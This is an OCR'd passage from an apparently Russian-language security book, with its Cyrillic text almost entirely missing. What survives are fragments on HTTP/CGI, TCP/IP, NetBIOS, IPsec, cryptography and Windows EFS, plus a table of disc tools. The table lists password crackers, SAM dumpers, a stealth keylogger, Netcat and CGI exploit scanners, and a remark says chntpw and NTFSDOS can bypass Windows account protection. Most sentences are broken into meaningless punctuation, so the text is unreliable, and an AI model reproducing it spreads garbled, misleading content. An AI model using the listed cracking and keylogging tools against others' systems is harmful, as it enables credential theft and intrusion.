Content-Disposition: form-data; name="name_of_sender11
Ivanov
--STRING_SEPARATOR
Content-Disposition: form-data; name="name_of_files";
filename="content.txt"
Content-Type: text/plain
. . . content.txt . . .
--STRING_SEPARATOR--

boundary, ,
.
"logo.gif",
.
Content-Type: multipart/form-data; ^=_
--_-Content-Disposition:
form-data; name="name_of_sender"
Ivanov
--_-Content-Disposition: form-data; name="name_of_files"
Content-Type: multipart/mixed; 1=_
--_-Content-Disposition: attachment; filenames"content.txt"
Content-Type: text/plain
. . . content.txt . . .
--_
Content-Disposition: attachment; filename="logo.gif"
Content-Type: image/gif
Content-Transfer-Encoding: binary
... l o g o . g i f . . .
_-_--

, , ,
- .
, .


HTML 4
HTTP
( HTTP).
HTTP ,
, HTTP ,
, HTTP

321

, , .
,
.
= SP __ SP
__ CRLF

SP - ASCII ( 32), -
HTTP, ,
URL, a CRLF - (CR) (LF).
HTTP ,
, HTML 4.
GET - ,
, URL .
.
POST , ,
,
URL .
HTML 4 HTTP,
, METHOD FORM.
.
METHOD "get",
ACTION HTTP,
ACTION, ?,
,


"application/x-www-form-urlencoded".
GET HTTP, URL .
GET
ASCII.
METOD "post", ACTION
HTTP,
POST HTTP ACTION
, ,
ENCTYPE (.
).
ACTION METHOD
HTML 4 .
GET POST HTTP .
, .

11 -1687

322


, HTTP
CGI. ,

Web, , HTTP. CGI
, Web , , , . CGI- -
Web . GGI , ,
.,
.
CGI- Web
. , CGI,
. , ,
, .
, , C/C++,
PHP, Fortran, Perl, TCL, Unix Schell, Visual Basic, Apple Script .
Web-,
(
).
,
CGI .
-.


, ,
- .
HTTP ,
, (Windows, UNIX .)
.
- ,
. , MS DOS
Windows, .
,
,
. ,
arj a archiv file.txt

323

arj.exe (
) archiv file.txt.
- , , . ,
, .
Web , .
getenv().
- ,
.
, . STDIN;
STDIN fgetc (stdin).
.
1=1&2=2&. . .
- (
), -
(.. ). ,
, ,
METHOD .
REQUEST_METHOD (. ).
GET URL , QUERY_STRING.
POST
. ,
, CONTENT_LENGTH,
. CONTENT_TYPE.
CONTENT_LENGTH.
.
.
<HTML>
<
<1> </1>
</HEAD>
<BODY>
1

324

<> </>
<FORM
ACTION="http : //www. anysite . com/prog /addsubs"
METHOD="post">
<INPUT TYPE="text" ID="firstname n >
<LABEL FOR="firstname n >HMH: </LABEL><BR>
<INPUT TYPE="text" ID="lastname">
<LABEL FOR="lastname">4>aMHnMH: </LABEL><BR>
<INPUT TYPE="text" NAME= n postal-address" ID=" email ">
<LABEL FOR=" email ">e-mail </LABEL><BR>
<INPUT TYPE=" checkbox" NAME=" subscribe ">
HOBOCTeu<BR>
<INPUT TYPE=" submit" VALUE=" "> <INPUT TYPE=" reset ">
</FORM>
</BODY>
</HTML>

POST ( FORM METHOD "post")
- 42 ,
:
postal-address=ivan@email .com&subscribe=on
CONTENT_LENGTH
42, CONTENT_TYPE
"application/x-www-form-urlencoded".
"",
.

.
(,
).

\ cmpoku
.
URL,
. (
URL , ).
.
,
, .

325


/
.
, ,
,
.
, ,
, ,
. ,
/
. - URL - ,
URL
.
.
,
URL ( ,
).

http://www.anysite.com/prog/addsubs/text/template/?namel=valuel
&name2=value2

.
/ . . . / a d d s u b s /text/template/ namel=valuel name2=value2

/ . . . / (.. )
-. ,
/text/template/. ,
- , (,
- ).
URL .
/prog/addsubs?xiamel=valuel&name2=value2

.
/.../addsubs ' ' namel=valuel name2=value2

(
,
CGI, .

326

SERVER_SOFTWARE - ,
. : /.
, : /1.1.
SERVER_NAME - Web-, DNS-,
IP- (
URL).
URL .
: www.anyserver.com
GATEWAY_INTERFACE - CGI, , . : CGI/.
: CGI/1.1.

CGI- .
CGI.
SERVER_PROTOCOL - , . : /.
, : /1.1
SERVER_PORT - , , , 80.
REQUEST_METHOD - , . HTTP 1.1 .
PATH_INFO - ,
URL . ,
URL http://www.anysite.com/prog/handler.exe/text/dot,
handler.exe, PATH_INFO
"text/dot". ,
,
. PATH_INPO.
PATH_TRANSLATED -
-,
URL . ,
Web-
/usr/local/etc/httpd/htdocs. , cgi-bin
, ..
:
http://www.anyserver.com/cgi-bin. URL
http://www.anyserver.com/cgi-bin/handler
PATH_TRANSIATED: /usr/local/etc/httpd/htdocs//cgi-bin/handler ..

327

,
.
SCRIPT_NAME - ,
.
URL ( , ,
HTML,
).
: /cgi-bin/handler.exe
QUERY_STRING - , "?" URL,
HTTP- .
.

. ,
URL

:
http://www.anysite.com/handler?postal-address=
ivan@email.com&subscribe=on QUERY_STRING
: postal-address=ivan@email .com&subscribe=on.
REMOTE_HOST - , .
,
REMOTE_ADDR, .
REMOTE_ADDR - IP- ,
. : 199.23.155.34.
AUTH_TYPE -
,
.
HTTP 1.1
RFC2616.
HTTP (, "challenge"), NULL.
REMOTE_USER - ,
( ) .
REMOTE_IDENT - HTTP- RFC931,
, . , .
CONTENT_TYPE - ,
, POST PUT HTTP, MIME- , , "application/x-wwwform-urlencoded".

328

CONTENT_LENGTH - , .
, POST, ,
.
_ - (MIME-),
.
.
HTTP.
: /, /... : image/gif,
image/x-xbitmap,image/jpeg
HTTP_USER_AGENT - , .
: / /.
: Netscape/4.6 (Win2000)



STDOUT,
.
HTML, ,
, ,
HTML.
,
, .
, HTTP .
, CGI ,
nph-.
.
, : , , , .

,
CGI
,
.
,
, HTTP, ,
CRLF. , , . CGI
.
Content-type - .

329

Location - ,
, , . URL,
.
, ,
.
Status - HTTP
, . : NNN
, NNN - , , , , : Forbidden
().
. ,
-,
HTML. , .

Content-type: text/html

,
, ,
.
int main(int argc, char *argv[])
{
printf("Content-Type: text/html\n\n");
printf("<HTML>\n");
printf ( "<11|> </112>\" ) ;
printf("<BODY>\n")
printf("<HI> !</HI>\n");
printf ("</BODYx/HTML>\n") ;
return(0);
}


HTML, printf ()
. HTTP, .
,
anydoc.txt, /text/
. ,

http://www.anyserver.com/text/anydoc.txt. ,
.

330

.

Location: /text/anydoc.txt

, , FTP, ,
: ftp://ftp.cso.uiuc.edu. .

Location: ftp://ftp.cso.uiuc.edu
---
, , -
,
, .

,
, , . , nph- HTTP. , SERVERJPROTOCOL "HTTP/1.1",
HTTP 1.1.

/1.1
Server: CERN/3.0 libwww/2.17
Content-type: text/plain

HTTP

, Web,
HTML, .
Web HTTP (Hypertext Transfer
Protocol - ). HTTP

.
HTTP 1.1 ( RFC 2616,
http://www.ietf.org/rfc/rfc2616.txt)
HTTP 1.2.
, HTTP 1.1.

cmpykmypa HTTP
Web
. Web,
, -
. HTTP
, () (,
).
, ,
. , ,
. ()
RFC 822. HTTP 1.1 ,
, (CR)
(LF) - CRLF, .

{__1 CRLF __2 CRLF ...)
CRLP
[ ]


.
,
, HTTP.
,
, .
; ,
200 , 402 , ..

332

, , ,
(, HTML).
,
. ( ,
) ,
(:).
=__ " : "

[ ]

,
, ,
.
,
, , , .

, , ,
.
, , ,
, (
), .
, .

HTTP, ,
,
HTML, .. .
(. .1).
.1. HTTP 1.1

Allow

,
, : Allow: GET, HEAD, PUT

ContentEncoding


, . , Content-Type, :
Content-Encoding: gzip
( gzip)

333

ContentLanguage

, :
Content-Language: da
( )

ContentLength

, :

ContentLocation

/ URL , , Web.
URL .

Content-MD5

(.. ,
) ,
RFC 1864.

ContentRange

, .

Content-Type

,
. :

Content-Length: 35645

Content-Type:Type"/"Subtype [__1 "="


_1;...]
- , a Subtype - ;
, . , :
Content-Type: text/html; charset=ISO-8859-4
, HTML, ISO-8859-4. IANA (Internet Assigned Numbers
Authority - ).
Expires

,
, :
Expires: Sat, 04 Dec 1999 16:00:00 GMT

Last-Modified

, : Last-Modified: Tue, 17 Dec 2001 11:40:26 GMT

334

. .1
,
(
HTML). , HTML, HTTP,
HTML.

HTTP
HTTP ,
(. ), .
, .
= SP __1 SP
__ CRLF

SP - ASCII ( 32), -
HTTP, ,
URL, a CRLP - (CR) (LF).
HTTP . .2.
. 2. HTTP

OPTIONS

,
.

GET

, , URL .

.

HEAD

GET ,
; HTTP .

POST

,
,
, URL
.

PUT

,
URL.

335

DELETE

, ,
URL .

TRACE


,
.

CONNECT

HTTP 1.1 ,
-.

, HTTP 1.1.

HTML 4 HTTP,
, METHOD FORM. HTML 4, W3C,
,
.
METHOD - "get" "post". .
METHOD "get",
ACTION HTTP,
ACTION, "?", ,
"application/xwww-form-urlencoded". GET
HTTP, URL .
GET ASCII.
METOD "post", ACTION
HTTP, POST
HTTP ACTION ,
,
ENCTYPE.

ACTION METHOD
HTML 4 . GET POST HTTP
.
. .2, GET , , -
, .. , .
,
Web,
GET.

336

, , ,
, POST.
GET
ASCII. POST
ENCTYPE, "multipart/form-data",
, ISO10646.

D.

TCP/IP
- . , ,
.
Windows 2000/XP .
,
.
,
, .

, . ,
(ISO - International Standards Organization),
. OSI (Open
System Interconnection - ).
OSI
. IPSec (Internet
Protocol Security - ), ,
, (
, - Microsoft).

OSI
ISO, ,
OSI,
. OSI :
.
.

.
.

.
12-1687

338

.
- - :
. - - :
,
. .


,
.
, 0 () 1 () ,
. , (lOBaseT, 100BaseT) (10Base2)
, .


,'.. ,
( ).

.
( ) .
Ethernet
Token Ring, .
OSI
.
.
. , 802 ( ), :
LLC (Logical Link Control -- ),
() .
MAC (Media Access Control - ),
CSMA/CD (Carrier Sense Multiple Access with Collision Detection ).
CSMA/CD Ethernet, (, ARCnet), Token Ring.

339


,
. ,
,
.
,
, .

. ,
.

.
, , -
.


.
.

.
.

NetBEUI, TCP/IP . ,
.



, .

.

.
, ,
NetBIOS Windows Sockets - TCP/IP.
Windows 2000 32- Windows Sockets
(Winsock) . ,
Winsock.

12*

340


,
, ,
(, ASCII EBCDIC IBM ). ,

.
-
(XDR -- External Data Representation),
(RFC - Remote Procedure Call).
RFC - , ,
, ,

. ,
,
. RPC
/.

bag
,
, ,
. ,
.
.
- RPC.

OSI
, OSI - - .
, ,
.
,
. , 0 1 . -,
, , , .. ,

(1 0), .

,

341

. . , , ,
,
, .. -,
. ,
, ,
- ,
.
, ,
.
, ,
, , .
, ,
, .. ,
, -
. , , , ;
, .. 1 0.
,
.
, , , .
-
, .
,
,
- , .

, , .
,
-
. -
, , , ,
, .
,
- ,
.

IP-agpeca u
TCP/IP .
.

342

,
.
, -.
. , . - ,
;
.
TCP/IP -
, .
, , - .
.
Windows NT/2000/XP :
, . Ethernet
- (Media Access Control -
), .
, 6 ,
-. , , ,
. -
12 , , 00 03 12 5D 4.
(, ATM Token
Ring) .
IP-
TCP/IP. , ,
IP-. , , ,
. ,
IP- ,
,
, InterNIC (http://www.internic.net.). IP-
, .
1 254 ( 0 255 ),
, 123.45.67.89 - -. .

.
(. IP- ).
TCP/IP
. ,
(Fully Qualified Domain Name - FQDN).
, webserver
webserver.company.com.

343

, TCP/IP.

. Windows FQDN
NetBIOS (. ).
.
(, company.com)

.
FQDN, a
.
NetBIOS Windows,
net use net view. Windows
(Network Neighborhood), NetBIOS Microsoft.
15 .

.

npomokoA TCP/IP

TCP/IP (Transmission Control
Protocol/Internet Protocol - / ), .
,
.
/ ,
NetBEUI, IBM
Microsoft, TCP/IP - . TCP/IP Internet (Internet Engineering Task Force IETF), (RFC - Request for Comments).
TCP/IP
,
. TCP/IP ,
, TCP/IP, ,
, Windows 2000, . TCP/IP , , , , , , .

344

, TCP/IP ,
IP-, IP.
TCP/IP - . ,
. , ,
, ,
. TCP/IP
IP-.

IP-agpeca
TCP/IP IP-,
.
, , ,
, .
, ,
.
IP- 32- ,
- ; IP-
,
0 255. , .. ,
, , 204.209.43.2.
- ,
, -
. ,
1 0, IP-
.
IP- , ,
, , D .
.
IP- 0. 7
. 24 , , .
, 126 , 16 777 214
.
.
10.

345

14 . 16 (..
) . ,
16 384 , 65 534 .
. -
110. 21
, 8
. , 2 097 152
, 254 .
D IP- .
- D
1110, ,
.

1111 .

. ,
50 , , , , .
128 - 191,
191 - 223. 223
. IP-,
.
- . , ,
, , ,
IP-,
, .
.
- ,
.
, ,
. ,
,
. - 32-
, IP-
. : ,
, 1, ,
, 0.
-
AND - . AND
: 1, 1;

346

0.
IP- 130.57.190.42 255.255.248.0.

10000010

00111001

10111110

00101010

11111111

11111111

11111000

00000000

10000010

00111001

10111000

00000000

- 130.57.184.0.

. IP-
.
Windows NT/2000/XP
(DHCP - Dynamic Host Configuration
Protocol), -
. /

.

TCP/IP
, TCP/IP ,
. . .
, , OSI.
, OSI.
, OSI.
,
OSI.

TCP/IP ,
Windows 2000.


/

/. ,

347

TCP/IP, ,
. ,
- TCP/IP.
:
HTTP (Hypertext Transfer Protocol - ) Web-.
FTP (File Transfer Protocol - ) -
Web.
SMTP (Simple Mail Transfer Protocol - ) .
Telnet - ,
.
DNS (Domain Name System - ) -
IP-.
RIP (Routing Information Protocol - ) .
SNMP (Simple Network Management Protocol -
) -
.
TCP/IP Windows 2000
: Windows Sockets ( Windows),
Winsock, NetBT (NetBIOS TCP/IP).
.

CpegcmBa Winsock
Winsock (
Winsock) ,
.
, .
TCP/IP,
,
.
Winsock
: ,
TCP, ,
UDP (User Datagram
Protocol - ).

348

Winsock (Application
Programming Interface - API), .
,
, ,
. ,
Winsock :
1.
Winsock .
, , , Winsock ,
IP- ,
.
2.

, ,
, IP- , Winsock
. , .
1024.

3. Winsock
( ) .
4.

Winsock
OSI,
.

5. -
TCP/IP , .
Winsock ( -
) -.
6.

,
. Windows NetBT ' ,
,
.

NetBT
NetBT (NetBIOS TCP/IP) NetBIOS (Network Basic Input Output System - ) TCP/IP. NetBIOS
Windows :

349

.
, NetBIOS, . NetBIOS , .
. NetBIOS
, , ,
.
.
, .
NetBIOS
NetBEUI (NetBIOS Extended User Interface - NetBIOS). TCP/IP
NetBIOS TCP UDP. , TCP NetBIOS. TCP/IP
NetBIOS,
Windows. Microsoft
NetBIOS TCP/IP NetBT.
NetBT
NetBIOS 137, 138 139. ,
NetBIOS, , Compl,
NetBT
137. , NetBIOS, , Compl 137. ,
,
.
, NetBIOS,
NetBT, NetBT
TDI (Transport Driver Interface -
). TDI
NetBT (.. NetBIOS) . Winsock TDI.
,
Winsock IP- .
TCP/IP ,
. OSI
,
IP-.
.

350


TCP/IP
, . ,
- Web-,
HTTP (. RFC 2616).
HTTP ,
, . .
, http://www.microsoft.com ,
www.microsoft.com,
HTTP.
, (, Web-)
OSI,
(, ),
. Winsock
, API (Application Programming Interface ).
, (..
) -,
Winsock .
Winsock NetBT .
.

l/1/insock
IP- Winsock
.
> API Winsock
HOSTS. HOSTS
LP-,
.
> HOSTS , Winsock
DNS (Domain Name Service - ).
> , API
NetBIOS.
HOSTS .
, IP- HOSTS
. HOSTS
\\__\132\15\1
.

351

DNS
IP-, DNS. Winsock
DNS
IP-. DNS :
.
IP-.
DNS
.

; DNS DNS,
, ,
.
IP- ,
DNS .
, ,
, IP-
IP- - IP- DNS
.
TCP/IP Windows 95/98/NT/2000/XP
DNS DHCP (Dynamic Host
Configuration Protocol - ).
DHCP IP- DHCP.
DHCP , DHCP IP-. DHCP
IP-, , TCP/IP.
Windows 2000
DNS. Windows 2000 Professional
DNS IP-,
DNS.
TTL (Time to Live - ), ,
. , , Windows 2000 Professional,
DNS, .

NetBIOS
NetBIOS 16 , 15
,
,
. NetBT
, NetBIOS -

352

IP-. () NetBIOS IP-


NetBT .
NetBIOS. NetBIOS -,
- .
,
NetBIOS .
WINS (Windows Internet Naming Service -
Windows). WINS Windows 2000
Server , WINS
-. WINS
Windows.
. WINS
NetBIOS IP-, NetBT -

IP-.
LMHOSTS. HOSTS
, IP-
NetBIOS.
#PRE, NetBIOS -
NetBIOS. LMHOSTS
\\_\5132\15\1 .SAM.
HOSTS. NetBT NetBIOS
HOSTS. HOSTS, HKEY_LOCAL_MACHINE\SYSTEM\CurrentControSet\
Services\NetBT\Parameters EnableDns.
DNS.
EnableDns ( ), NetBT
NetBIOS DNS.

TCP/IP.


TCP/IP .
,
.
,
(TCP UDP), IP-
.

353

TCP .
TCP/IP
TCP, UDP, .

TCP
TCP (Transmission Control Protocol - )
.
. TCP
, ,
. , , ,
.
TCP
() . TCP.
- .
- -.
- TCP.
TCP , TCP.
- ,
.
. -,
. FIN,
, .
- ,
. TCP .
. ,
.
.
, - -
.
, TCP
.
. .

354

1.

- TCP,
TCP
.

2.

- TCP,
, TCP
TCP .

3. - TCP,
-.
TCP
. , - TCP
-,
. Windows
TCP 64 . Windows 2000
TCP 1 ,
TCP.
TCP SYN. ,
.
D.I. TCP.
D.I. TCP

TCP-

20

FTP

21

FTP

23

Telnet

80

Web- HTTP

139

NetBIOS

UDP
(UDP
User Datagram Protocol)
,
( ).
UDP .
UDP TCP;
, .

355

UDP ,
. UDP
, , NetBIOS NetBIOS
SNMP.
D.2 UDP-.
D.2. UDP
UDP-

53

DNS

137

NetBIOS

138

NetBIOS

161

SNMP

Me>kcemeBou

TCP/IP.
,
.
.
D? (Internet Protocol - ) - IP-
,
.
ARP (Address Resolution Protocol - )
.
ICMP (Internet Control Message Protocol -
) - IP-. ICMP
ping tracert, W2RK.
IGMP (Internet Group Management Protocol -
) .
, ,
IGMP.
.

356

IP
IP
TCP/IP. IP- ,
, -.
IP- .

IP- . IP- - IP-.

IP- . IP- - -.
.
, , - .
(TTL). .

, IP-
.
. ,
IP- - TCP, UDP, ICMP .
. -.
IP
- ,
.
, ,
.
IP-
IP-
-. TTL ,
IP- . PJP, 30

. , .

ICMP

. ICMP -
-. ICMP
, - IP-
()
.

357

IGMP
,
.
, IGMP. IGMP , ,
, .
1 - ,
2 - , . TCP/IP Windows 2000 Windows NT 3.51. , IGMP,
NetShow.

ARP

.
MAC (Media Access Control -
). MAC ( -) - 48- ,
. - MAC , ,
TCP/IP.
-,
, NetBIOS - -.
ARP (Address Resolution Protocol - ), RFC 826.
ARP TCP/IP. .
ARP IP- .
1. ARP,
IP- -.
2.

ARP ,
ARP. -
, IP- , - . ARP ,
.

3.

ARP -
, . ,
. , ARP,
, -, .
-
ARP.

358
4.

.
-
ARP. .

, -
. , -
. , IP
, - - .


( )
TCP/IP / . TCP/IP
Ethernet, Token Ring, X.25 Frame Relay.
,
.
-
Windows 2000 NDIS (Network Driver Interface Specification ) 5 (NDIS 5.0).

Active Directory
TCP/IP Windows 2000
, ,
,
.. Windows 2000
AD (Active Directory),
, Windows NT.
AD ,
, , OU
(Organizational Unit).

DNS ( OSI
, ).
, DNS, .
, - .
, .
, , .
, ,

359

. ,
.
Windows NT 4,
,
.

, .
, , , . , .
.
Windows NT .
Windows 2000 :
, ,
, .
: ,
.
, Windows NT. ,
Windows 2000 .
-
, - ,
- . AD Active Directory Users
and Computers (Active Directory - ), Security
Configuration and Analysis ( ) ,
Windows 2000/XP.
AD Windows 2000/XP
LDAP (Lightweight Directory Access Protocol ) LDAP AD, , . ,
LDAP [3].
AD [6]
AD,
AD.
, Windows 2000/XP - IP-.

360

1-
TCP/IP , , , , , . ,
, - ,
.
/.
.
.
,
.
( , sniffing - ).
. , ,
,
, .
IP-. TCP/IP IP, IP- (. ), ,
, . IP- , , ,
, .
. -
. ,
,
, .
- .
, , -
, , -
SAM .
DoS (Denial of Service - ).
, .
, .
,
,
, .
. , -

361

. .
/
.
.
, . ,
(, pcAnywhere). ,
- , , ,
.
IP-,
IPsec (Internet Protocol Security

),
IP- . IPsec , TCP/IP, TCP/IP
. ,
IPsec.

IPsec
IPsec , ,
. ,
IPsec , IPsec , , .
, IPsec
-

.
IPsec ,
, , - , ,
. , . , , ,
(, LC4)
.
,
,
,

362

. IPsec , - .
, (
), - IPsec
.
IPsec ,
. IPsec .
. IPsec
,
.
, (PKI), - .
,
DES 3DES.
(Hash Message Authentication
Codes). -
, .
.
MD5 SHA.

.
IPsec IP, IPsec
. IPsec ,
, .
IPsec ,
. IP- ,
.
IP-, Windows 2000/XP
(, [6]).

- (, , ),
.
: , , ,
, , . ? ( )
, .
, (.. ) , , , .
, .


, ,
, . ,
, , .. ,
, .
,
- . , .
- , . - ,
( ).
( - ).
, .
, :
()=


D , .
D(C)=0

364


, D - . , 3 . - , , . ,
.
, (), . , , , , , ?
. .
.
, - .
. ,
, -
.
.
.
.


, ,
, . , , , .
. -, .
- , - , ,

. , /. .

365

, , ,
, .
, .
: , / ; ,
.
, /
, . ( ) ,
( )
. - .

; .
(0)=
DK(C)=0

,
.. ()
(2). .
1(0)=
DK2(C)=0

,
- .
-
, .
;
-
. ,
,
.
: .

366


,
. ,
.

. , , , , ( ,)
. , , ; .
.
(0)=
D K (C)=0

, , / .
, . , . / - , (
), , , . ( ) ( ). 64 .


( )
,
:
. , .. ( ).
, ,
, ,
, . , ,
.

367

(0)=
D K (C)=0

, , .
- , ,
. .
, . , , '= () N , ' ,
, .. '=.
, - , '. N , . , ,
. .


,
(, , - ). - ,
.
-
, .
, ,
, .
, ,
, ,
. , !
, , .
.
. , ,
.
.
, , .

368

.
, - .
. ,
,
, .
.

, . .
. ,
.
.
, , , .
.
. , .
, .
, .
, .
,
. ,
2128 ( ), , ,
1019, .
.
- , , . , , , ,
, .
, , .

369

, , , ,
.
. ,
,
, ,
.

1
,
,
. ,
. , - , . ,
.
, , , , . , . ,

,
.
, . -1
-2 , .
, , , , , , , . .

13-1687

370


-1 -2
, . .
1. -1
.
2.
3.
4.
5.

-2

-1 -2 .
-1
.
-1 -2.
-2
.

, , , ( 4 ).
, ,
, ,
, ,
. ( ), ,
.
?
-

, , , .
, , , .
.
, , ,
. -1, -2 .
, ,
. , .
, :

371

.
,

.
, .


- . , ,
,
.
.
1. -1 -2
.
2.
3.

-1 -2 .
-2 -1
-1.

4. -1
-2.
, , , PGP Desktop Security.
.
1.

-1 -2 .

2.

-1 ,
-2, -2.

3.

-2 -1.

, ,
() , ,
, ,
, .
13'

372

,
,
, -
.
, .

kpunmocucmeMbi

,
, .
.

.
1.

-2 -1 .

2.

-1 , -2 -2.
.
2 ()

3.

, -2 -1 .
D2(E2(K))=K

4.

, .

5. .

. , ,
,
- .


, .
, . .

. 2,
.

373

1.

-1 -2
.

2.

3.

, -1, 2.

4.

-2.

5.

-2 2
-1 .

-1 ,
-1 . ,
, . , :
, .
,
.
.
. , , -2
(.. ), ,
.
. . -2, ,
-1,
,
, -1.
. -1 , , .
- , , , ( ).
.
. , .

( , , ),

374

. , (, ),
, .

,
, , ,
. ,
, . - , ,
-. , , .

-!<1
, ,
, .. , F(x)
,
F ( x ) .
. , , , .'
, ( ).

. , ,
-
.
,
F ( X ) , F(x)
, z.

.
-, (), , h ' , .. :
h=H(M)
h, , , .
,
, - -

375

, , , .
, h.
h, , () =h.
, , ', () =('),.
. -1 ()
. ? , , ', , , .. ()=('),
.
-, , , , ,
. ,
-1 ,
-2 , -1
,
.
.


, , ,
, - . :
S K (M)

:
V K (M)

, ,
, . ,
.
,
, .
.

376
1.

.
-1 .
Si(M)

2.

-1
-2 -2.
E2(Sj.(M))

3. -2 .
D z C E j t S i C M ) ) ) = Si(M)

4.

-2 ,
-1, .

Vi(Si(K))"VL
. -,

/ ; -1 , . -,
. ,

. -, .
,
, .

(
2002 ).

.
(PKI - Public Key Infrastructure).


, PKI,
- , .
-1 -2,
-2. -2
, , , .
.
, -1 -2.

377

-2 ?
,
, .
-2 -1 , .
, ,
-2 . , , .
.

Cepmucfukambi omkpbimbix
, . ,
, , - , . , , ( - Certification Authority). , , , , ,
.
.
PKI .
, , ,
. , , , - . -
, , :
, ,
.
.
. ,
- ,
. , -
.
.

378

, ,
.

, .
,
.
Windows 2000 Server Advanced Server PKI .
, Windows NT

Web-. Windows 2000 Professional , Web, .
Windows 2000 Professional
X.509v3 ( 3), ITU-T (International Telecommunications Union - ) . X.509v3 - , ,
, . Windows 2000
, ,
. Windows 2000 , (Certificates) .


PKI, , , PKI,
. , ;
. ,
, , ,
, , .
, , - , , , . -- ,
. - ; , . ,

379

, , , PKI ,
.
PGP Desktop Security,
( ).
PGP
, . .
, Windows 2000/XP ,
, NTFS,
, Windows 2000.
Windows 2000 ,
.

Windows 2000
Windows 2000 - Professional, Server Advanced Server -
EPS (Encrypted File System). EFS
, NTFS ( FAT). DESX 56-
.
;
Windows 2000 , DDF (Data Decipher Field - ). DDF Windows 2000, .
,
, ,
.
Windows 2000 Professional .
- , () .. EFS .
Windows 2000
, (
, ).
, EFS? DESX DES (Data Encryption Standard -
), , , -

380

, , 2000
AES (Advanced Encryption Standard - ). , 56- , (, ).
Windows 128- , Microsoft Enhanced CryptoPAK.
Microsoft (My Documents) /Temp , .
, (, MS Office
..).
Microsoft EFS
, . [3]
,
chntpw.exe. ,
(
Linux),
, SAM,
SYSKEY.
, [3] Windows
2000 SAM , , Windows 2000 , NTFSDOS Pro
(http://www.sysinternals.com),
NTFS. , ,

, .
, chntpw.exe , . , EFS
- , , ,
, .
, Microsoft EFS,
.
Windows ,
Windows
.

F. kojuinakm-gucka

""

95sscrk.zip

!?55

Win95 Screensaver
password cracker


Windows 95/98

2 acpr.zip

Advanced Access
Password Recovery


Microsoft Access
95/97/2000

www.elcomsoft.com

3 ae2000pr.zip

Advanced Excel 2000


Password Recovery


Microsoft Excel 2000

www.elcomsoft.com

4 aimpr.zip

Advanced Instant
Messengers Password
Recovery


- ICQ, AOL IM,
Yahoo! Messenger, MSN Messenger .

www.elcomsoft.com

5 amipswd.rar

AMI BIOS password


decipherer

BIOS

6 Antexp.zip

Advanced NT Security
Explorer


Windows NT/2000/XP.

7 AntiSniff

AntiSniff

8 aoepr.zip

Advanced Outlook
Express Password
Recovery

www.elcomsoft.com

9 aopb.zip

Advanced Office
Password Breaker



Word Excel 97/2000

www.elcomsoft.com

www.elcomsoft.com/

10 aoxppr_p.zip

Advanced Office XP
Password Recovery


Word, Excel, Access, Outlook, Project, Money,
PowerPoint, Visio, Publisher, Backup,
Schedule*, Mail

www.elcomsoft.com

11 aoxppr_s.zip

Advanced Office XP
Password Recovery



Word, Excel, Access

www.elcomsoft.com

12 aw2000pr.zip

Advanced Word 2000


Password Recovery


Word 97/2000

www.elcomsoft.com

13 azpr.zip

Advanced ZIP Password


Recovery
ZIP/PKZip/WinZip

www.elcomsoft.com

14 brutus-aet2.zip

Brutus-AET2

www.hoobie.net/brutus

15 CGIScan.zip

CGI Vulnerability Scan

Web-

www.wangproducts.co.uk

16 Cgiscan3.zip

CGI Exploit Scanner v 3.


Web-

Linux,

Windows,

17 chntpw

chntpw

18 Cleaner3.exe

The Cleaner 3.5

www.moosoft.com

19 Clndisk.exe

Clean Disk Security

,,

"SSSSST
www.nai.com

20 CyberCop_Scanner_ CyberCop Scanner 5.5


CSCI550E.zip

21 dcs21.zip

D@mned CGI Scanner

CGI-

22 els004.zip

ELSave

23 Foundstone Tools


Foundstone


: , ,
.

24 grabitall.zip

GrabitAII

www.ntsecurity.nu

25 Hping


Hping


(.. ) ICMP,

www.hping.org

26 hunt


Hunt

TCP-

27 ICQ Groupware

ICQ

ICQ

www.icq.com

ICQ submachine-

ICQ

http://uinhunters.net

28 icqsmg14.zip

www.foundstone.com

Gun v1.4.

29 iks2k21d.exe

Invisible KeyLogger
Stealth

www.keylogger.com

30 kerio-wrp-425-ruwin.exe

WinRoute Pro 4

www.kerio.com

31 kitd.exe

Passware Kit 5.7


, ICQ,
, , Window

www.lostpassword.com

32 Ic4setup.exe

LOphtCrack (LC4)

SAM
(Security Account Manager)

33 legion.zip

Legion v 1 .2.

packetstormsecurity.org/
groups/rhino9

34 Iegionv21 .zip

Legion v2.1.

packetstormsecurity.org/
groups/rhinoS

35 Lib

,

-

www.microsoft.com

36 Isadump2.zip

Isadump2


Windows,
Windows

www.webspan.net/~tas/
Isadump2

37 nc11nt.zip

Netcat 1.10 for NT


Web- IIS

38 Nmap


Nmap

,
,
ACL

www.insecure.org/nmap


NTFS MS-DOS

www.winternals.com
www.agnitum.com

39 NTFSDOS Pro 4.0.zip NTFSDOS Pro

www.atstake.com

40 OutpostProlnstall-2-0.exe

Agnitum OutpostFirewall
Pro v 2.0

41 PGP

PGP Desktop
Security 7.0.3

www.pgp.com

42 pro12.exe

TeleportPro v 1.2.

www.tenmax.com

"SSST

^=

^"

43 PS4Demo.exe

PhoneSweep


,
,
,

www.sandstorm.net

44 PwDump

'
PwDump

www.ebiz-tech.com

45 pwltool.zip

PWL&NetTools v 6.80


Windows 9x/Me

46 reti na4943demo.exe Retina - Network


Security Scanner


Web-

47 RevelationV2.zip

Revelation v 2 .0

,
*****

www.snadboy.com

48 satndump.zip

SAMDump


SAM

49 showin.zip

ShoWin v 2.0

www.foundstone.com

50 slpro_20.exe

ScreenLock

www.screenlock.com

www.solarwinds.net

51 SolarWinds2002-PP- SolarWinds Professional 37


Eval.exe
Plus

www.eeye.com

.,.

52 spynet.zip

SpyNetvO.1

53 spynet312.exe

SpyNetv3.12

54 superscan121.exe

SuperScan v 1.21

55 tcpdump


tcpdump

www.tcpdump.org

56 tftpd32m.zip

Tftpd32 ,

www.superscan.net

tftp32.jounin.net

TFTP-, -,
DHCP- syslog-

57 Tripwire

Tripwire

www.tripwiresecurity.com

58 wgsetup.exe

WinGate v 5.0.7

www.wingate.com

59 ZZ.exe

Zombie Zapper

razor.bindview.corrvtools/
ZombieZapper_form.shtml

Cnucok
1. 2000-2003 .
2. .. - .: -, 2001. - 624 .: .
3. - ., ., . . , 2- .: . . - .: ,
2001.- 656 .: . - . . .
4. - ., ., . . Windows
2000 - .; . . - .: ,
2002.- 264 .: . - . . .
5. . .
. - 560 . - .: ,
2002.- ( ).
6. . . Windows 2000.:
Windows 2000.: . . - .: , 2001. - 592
.: . - . . .
7.

Alex JeDaev . - .:
, 2002 - 432 .: .

8. . . (+CD). .:, 2002. - 864 .: .


9. .. .: . . - .: +, .:
, .: -, 2001.- 272 .
10. . .
-.: ,
2000. - 736 .
11. ., . . Web- .; . . - .: , 2003.384 .: . - . . .
